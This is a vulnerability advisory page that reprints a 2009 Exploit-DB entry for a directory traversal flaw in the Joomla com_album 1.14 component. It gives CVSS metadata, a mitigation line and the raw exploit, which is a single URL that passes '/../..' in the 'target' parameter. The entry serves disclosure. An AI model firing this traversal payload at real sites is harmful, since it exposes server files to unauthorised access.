Joomla Component com_album Directory Traversal Vuln

vendor:

Album

by:

DreamTurk

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Album

Affected Version From: 1.14

Affected Version To: 1.14

Patch Exists: YES

Related CWE: N/A

CPE: a:roland_breedveld:album

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_album Directory Traversal Vuln

A directory traversal vulnerability exists in Joomla Component com_album version Album #1.14. An attacker can exploit this vulnerability to traverse directories and access sensitive information. The vulnerable parameter is 'target' in the URL 'http://localhost/index.php?option=com_album&Itemid=128&target=/../..'

Mitigation:

Ensure that user input is validated and sanitized before being used in a filesystem operation.

Source

Exploit-DB raw data:

Joomla Component com_album Directory Traversal Vuln   (version Album #1.14 )

# Author     : DreamTurk

# mail       : dr3amturk@aol.com

# home page  : www.turkguvenligi.info

Down : http://www.breedveld.net/index.php?option=com_remository&Itemid=193&func=startdown&id=1
exp  : http://localhost/index.php?option=com_album&Itemid=128&target=/../..

# gretZ : aLL My Friends & turkguvenligi.info Members & t4cs1zkr4L

note:
<name>Album</name>
<creationDate>23-05-2007</creationDate>
<author>Roland Breedveld</author>
<copyright>
This component is released under the GNU/GPL License
</copyright>
<authorEmail>Roland@Breedveld.net</authorEmail>
<authorUrl>Breedveld.net</authorUrl>
<version>1.14</version>
<description>Album Component For Joomla</description>/str0ke

# milw0rm.com [2009-09-17]